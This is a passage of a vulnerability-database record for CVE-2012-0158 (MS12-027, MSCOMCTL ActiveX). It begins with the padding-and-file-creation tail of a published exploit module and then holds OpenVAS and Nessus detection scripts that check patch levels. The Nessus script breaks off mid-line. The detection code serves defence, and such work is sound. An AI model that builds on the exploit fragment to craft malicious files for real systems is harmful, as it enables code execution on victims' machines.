\"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000\"\r\n\t\tcontent << \"\\n\"\r\n\t\tcontent << \"}\"\r\n\t\tcontent << \"}\"\r\n\t\tcontent << \"}\"\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(content)\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18780/"}], "openvas": [{"lastseen": "2017-07-02T21:10:34", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.", "modified": "2017-02-20T00:00:00", "published": "2012-04-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902829", "id": "OPENVAS:902829", "title": "Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms12-027.nasl 5366 2017-02-20 13:55:38Z cfi $\n#\n# Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code\n within the context of the application.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft SQL Server 2008\n Microsoft Visual Basic 6.0\n Microsoft Commerce Server 2009\n Microsoft SQL Server 2005 Service Pack 4\n Microsoft SQL Server 2000 Service Pack 4\n Microsoft Visual FoxPro 9.0 Service Pack 2\n Microsoft Visual FoxPro 8.0 Service Pack 1\n Microsoft Commerce Server 2007 Service Pack 2\n Microsoft Commerce Server 2002 Service Pack 4\n Microsoft Office 2010 Service Pack 1 and prior\n Microsoft Office 2007 Service Pack 3 and prior\n Microsoft Office 2003 Service Pack 3 and prior\n Microsoft SQL Server 2000 Analysis Services Service Pack 4\";\ntag_insight = \"The flaw is due to an error within the ListView, ListView2, TreeView\n and TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls and can\n be exploited to corrupt memory.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms12-027\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.\";\n\nif(description)\n{\n script_id(902829);\n script_version(\"$Revision: 5366 $\");\n script_bugtraq_id(52911);\n script_cve_id(\"CVE-2012-0158\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 14:55:38 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 11:11:11 +0530 (Wed, 11 Apr 2012)\");\n script_name(\"Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/48786\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1026904\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-027\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nkey = \"\";\nver = \"\";\nkeys = \"\";\nitem = \"\";\npath = \"\";\nsysPath = \"\";\nbizName = \"\";\ndllVer = NULL;\nsysVer = NULL;\nexeVer = NULL;\n\n## Check for Windows OS\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(! sysPath){\n exit(0);\n}\n\n## Get Version from Mscomctl.Ocx file\nsysVer = fetch_file_version(sysPath, file_name:\"system32\\Mscomctl.Ocx\");\nif(! sysVer){\n exit(0);\n}\n\n## Check for Microsoft Office 2003, 2007 and 2010\nif(get_kb_item(\"MS/Office/Ver\") =~ \"^[11|12|14].*\")\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n## Check for Microsoft BizTalk Server 2002\nkey = \"SOFTWARE\\Microsoft\\BizTalk Server\\1.0\";\nif(registry_key_exists(key:key))\n{\n bizName = registry_get_sz(key:key, item:\"ProductName\");\n if(\"Microsoft BizTalk Server 2002\" >< bizName)\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for SQL Server 2005 and 2008\nforeach ver (make_list(\"2005\", \"10\"))\n{\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\Microsoft SQL Server \" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft Commerce Server 2002, 2007 or 2009\nkeys = make_list(\"SOFTWARE\\Microsoft\\Commerce Server\",\n \"SOFTWARE\\Microsoft\\Commerce Server 2007\",\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"+\n \"\\Microsoft Commerce Server 2009\");\nforeach key (keys)\n{\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Visual Basic 6.0\nkey = \"SOFTWARE\\Microsoft\\Visual Basic\\6.0\";\nif(registry_key_exists(key:key))\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n## Check for Visual FoxPro 8.0 and 9.0\nforeach ver (make_list(\"8.0\", \"9.0\"))\n{\n key = \"SOFTWARE\\Microsoft\\VisualFoxPro\\\" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft SQL Server 2000 Analysis Services\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000 Analysis Services\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n dllVer = fetch_file_version(sysPath:path, file_name:\"bin\\msmdctr80.dll\");\n if(dllVer)\n {\n if(version_is_less(version:dllVer, test_version:\"8.0.2302.0\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft SQL Server 2000\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n exeVer = fetch_file_version(sysPath:path, file_name:\"Binn\\sqlservr.exe\");\n if(exeVer)\n {\n ## Check for GDR and QFE versions\n if(version_is_less(version:exeVer, test_version:\"2000.80.2065.0\") ||\n version_in_range(version:exeVer, test_version:\"2000.80.2300.0\", test_version2:\"2000.80.2300.9\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:04:19", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.", "modified": "2020-01-07T00:00:00", "published": "2012-04-11T00:00:00", "id": "OPENVAS:1361412562310902829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902829", "title": "Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902829\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_bugtraq_id(52911);\n script_cve_id(\"CVE-2012-0158\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 11:11:11 +0530 (Wed, 11 Apr 2012)\");\n script_name(\"Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1026904\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute arbitrary code\n within the context of the application.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft SQL Server 2008\n\n - Microsoft Visual Basic 6.0\n\n - Microsoft Commerce Server 2009\n\n - Microsoft SQL Server 2005 Service Pack 4\n\n - Microsoft SQL Server 2000 Service Pack 4\n\n - Microsoft Visual FoxPro 9.0 Service Pack 2\n\n - Microsoft Visual FoxPro 8.0 Service Pack 1\n\n - Microsoft Commerce Server 2007 Service Pack 2\n\n - Microsoft Commerce Server 2002 Service Pack 4\n\n - Microsoft Office 2010 Service Pack 1 and prior\n\n - Microsoft Office 2007 Service Pack 3 and prior\n\n - Microsoft Office 2003 Service Pack 3 and prior\n\n - Microsoft SQL Server 2000 Analysis Services Service Pack 4\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error within the ListView, ListView2, TreeView\n and TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls and can\n be exploited to corrupt memory.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mscomctl.Ocx\");\nif(!sysVer){\n exit(0);\n}\n\nofficeVer = get_kb_item(\"MS/Office/Ver\");\n\nif(officeVer && officeVer =~ \"^1[124]\\.\")\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\BizTalk Server\\1.0\";\nif(registry_key_exists(key:key))\n{\n bizName = registry_get_sz(key:key, item:\"ProductName\");\n if(\"Microsoft BizTalk Server 2002\" >< bizName)\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nforeach ver (make_list(\"2005\", \"10\"))\n{\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\Microsoft SQL Server \" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkeys = make_list(\"SOFTWARE\\Microsoft\\Commerce Server\",\n \"SOFTWARE\\Microsoft\\Commerce Server 2007\",\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"+\n \"\\Microsoft Commerce Server 2009\");\nforeach key (keys)\n{\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Visual Basic\\6.0\";\nif(registry_key_exists(key:key))\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nforeach ver (make_list(\"8.0\", \"9.0\"))\n{\n key = \"SOFTWARE\\Microsoft\\VisualFoxPro\\\" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000 Analysis Services\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n dllVer = fetch_file_version(sysPath:path, file_name:\"bin\\msmdctr80.dll\");\n if(dllVer)\n {\n if(version_is_less(version:dllVer, test_version:\"8.0.2302.0\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n exeVer = fetch_file_version(sysPath:path, file_name:\"Binn\\sqlservr.exe\");\n if(exeVer)\n {\n if(version_is_less(version:exeVer, test_version:\"2000.80.2065.0\") ||\n version_in_range(version:exeVer, test_version:\"2000.80.2300.0\", test_version2:\"2000.80.2300.9\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-05-01T02:35:57", "bulletinFamily": "scanner", "description": "A memory corruption issue exists in Windows common controls,\nspecifically within the MSCOMCTL.TreeView, MSCOMCTL.ListView2,\nMSCOMCTL.TreeView2, and MSCOMCTL.ListView controls component of\nMSCOMCTL.OCX, due to improper sanitization of user-supplied input. An\nunauthenticated, remote attacker can exploit this issue by convincing\na user to view a specially crafted web page, resulting in the\nexecution of arbitrary code.", "modified": "2020-05-02T00:00:00", "id": "SMB_NT_MS12-027.NASL", "href": "https://www.tenable.com/plugins/nessus/58659", "published": "2012-04-11T00:00:00", "title": "MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2664258)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58659);\n script_version(\"1.35\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-0158\");\n script_bugtraq_id(52911);\n script_xref(name:\"EDB-ID\", value:\"18780\");\n script_xref(name:\"MSFT\", value:\"MS12-027\");\n script_xref(name:\"MSKB\", value:\"983807\");\n script_xref(name:\"MSKB\", value:\"983808\");\n script_xref(name:\"MSKB\", value:\"983809\");\n script_xref(name:\"MSKB\", value:\"2597112\");\n script_xref(name:\"MSKB\", value:\"2598039\");\n script_xref(name:\"MSKB\", value:\"2598041\");\n script_xref(name:\"MSKB\", value:\"2641426\");\n script_xref(name:\"MSKB\", value:\"2645025\");\n script_xref(name:\"MSKB\", value:\"2647488\");\n script_xref(name:\"MSKB\", value:\"2647490\");\n script_xref(name:\"MSKB\", value:\"2655547\");\n script_xref(name:\"MSKB\", value:\"2658674\");\n script_xref(name:\"MSKB\", value:\"2658676\");\n script_xref(name:\"MSKB\", value:\"2658677\");\n\n script_name(english:\"MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2664258)\");\n script_summary(english:\"Checks for kill bit.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A memory corruption issue exists in Windows common controls,\nspecifically within the MSCOMCTL.TreeView, MSCOMCTL.ListView2,\nMSCOMCTL.TreeView2, and MSCOMCTL.ListView controls component of\nMSCOMCTL.OCX, due to improper sanitization of user-supplied input. An\nunauthenticated, remote attacker can exploit this issue by convincing\na user to view a specially crafted web page, resulting in the\nexecution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-027\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Office 2003, 2007 and\n2010; Office 2003 Web Components; SQL Server 2000, 2005, 2005 Express\nEdition, 2008, and 2008 R2; BizTalk Server 2002; Commerce Server 2002,\n2007, 2009, and 2009 R2; Microsoft Visual FoxPro 8.0 and 9.0; and\nVisual Basic 6.0 Runtime.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS12-027 MSCOMCTL ActiveX Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_web_components\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sql_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_basic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_foxpro\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:biztalk_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:commerce_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\n \"smb_hotfixes.nasl\",\n \"ms_bulletin_checks_possible.nasl\",\n \"mssql_version.nasl\",\n \"commerce_server_installed.nasl\",\n \"biztalk_server_installed.nasl\",\n \"foxpro_installed.nasl\",\n \"office_installed.nasl\"\n );\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_activex_func.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS12-027';\nkbs = make_list(\n '983807',\n '983808',\n '983809',\n '2597112',\n '2598039',\n '2598041',\n '2641426',\n '2645025',\n '2647488',\n '2647490',\n '2655547',\n '2658674',\n '2658676',\n '2658677'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Uninstall/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, 'activex_init');\n\nclsids = make_list(\n '{bdd1f04b-858b-11d1-b16a-00c0f0283628}',\n '{996BF5E0-8044-4650-ADEB-0B013914E99C}',\n '{C74190B6-8589-11d1-B16A-00C0F0283628}',\n '{9181DC5F-E07D-418A-ACA6-8EEA1ECB8E9E}'\n);\n\nactivex_report = NULL;\nvuln = 0;\n\nforeach clsid (clsids)\n{\n # Make sure the control is installed\n file = activex_get_filename(clsid:clsid);\n if (isnull(file) || !file) continue;\n\n # Get its version\n version = activex_get_fileversion(clsid:clsid);\n if (!version) version = 'unknown';\n\n if ((version != 'unknown' && ver_compare(ver:version, fix:'6.1.98.33') < 0) && activex_get_killbit(clsid:clsid) == 0)\n {\n vuln++;\n if (!isnull(activex_report)) activex_report += '\\n';\n activex_report +=\n '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version;\n }\n}\n\nactivex_end();\n\nanalysis_svcs_installed = !isnull(get_kb_item('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Microsoft SQL Server 2000 Analysis Services/DisplayName'));\nsql_ver_list = get_kb_list(\"mssql/installs/*/SQLVersion\");\nanalysispath = NULL;\nvfp8_installed = !isnull(get_kb_item('SMB/VFP8.0/path'));\nvfp9_installed = !isnull(get_kb_item('SMB/VFP9.0/path'));\ncommerce_edition = get_kb_item('SMB/commerce_server/productname');\nvb6_installed = FALSE;\noffice_version = hotfix_check_office_version();\nowc2003_installed = FALSE;\n\nbiztalk_editions = make_list();\nbiztalk_installs = get_installs(app_name:\"BizTalk Server\");\nif (!empty_or_null(biztalk_installs[1]))\n{\n foreach biztalk_install (biztalk_installs[1])\n biztalk_editions = make_list(biztalk_editions, biztalk_install['Product Name']);\n}\n\nuninst_array = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nforeach item (keys(uninst_array))\n{\n name = uninst_array[item];\n\n if (name == 'Microsoft Office 2003 Web Components')\n {\n # determine if this is an 11.x or a 12.x\n ver_key = item - \"DisplayName\";\n ver_key += \"DisplayVersion\";\n owc_ver = get_kb_item_or_exit(ver_key);\n\n if (\n # OWC 2003 SP3 (11.0.8173.0)\n owc_ver =~ \"^11\\.\" &&\n ver_compare(ver:owc_ver, fix:'11.0.8173.0', strict:FALSE) >= 0\n )\n owc2003_installed = TRUE;\n else if (\n # OWC 2003 for 2007 SP2 (12.0.6425.1000)\n # OWC 2003 for 2007 SP3 (12.0.6607.1000); note this\n # branch is vuln and there's no need for an upper\n # boundary until (and if) an SP4 is released.\n owc_ver =~ \"^12\\.\" &&\n ver_compare(ver:owc_ver, fix:'12.0.6425.1000', strict:FALSE) >= 0\n )\n owc2003_for_office2007_installed = TRUE;\n\n break;\n }\n}\n\nif (vuln > 0 || analysis_svcs_installed)\n{\n registry_init();\n hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n # If the ActiveX stuff looks unpatched, try to determine which KBs are missing\n if (vuln > 0)\n {\n if (!isnull(get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Setup\\Microsoft Visual Basic\\ProductDir\")))\n vb6_installed = TRUE;\n }\n\n # determine if 32 or 64-bit office is installed. this value is reportedly whenever office 2010 is installed, even if outlook is not installed\n if (office_version['14.0'])\n office_bitness = get_registry_value(handle:hklm, item:\"Software\\Microsoft\\Office\\14.0\\Outlook\\Bitness\");\n\n # get the SQL Server 200 Analysis Services path if it looks like it's installed\n if (analysis_svcs_installed)\n {\n analysispath = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL Server 2000 Analysis Services\\InstallLocation\");\n\n if (analysispath)\n analysispath += \"\\bin\";\n }\n\n RegCloseKey(handle:hklm);\n close_registry();\n}\n\nprod_info = NULL;\n\nif (vuln)\n{\n activex_report = 'The following vulnerable controls do not have the kill bit set :\\n' + activex_report;\n prod_info = NULL;\n\n if (office_version['11.0'] || owc2003_installed)\n {\n flag = TRUE;\n if (office_version['11.0'])\n {\n sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (!isnull(sp) && sp < 3) flag = FALSE; # < 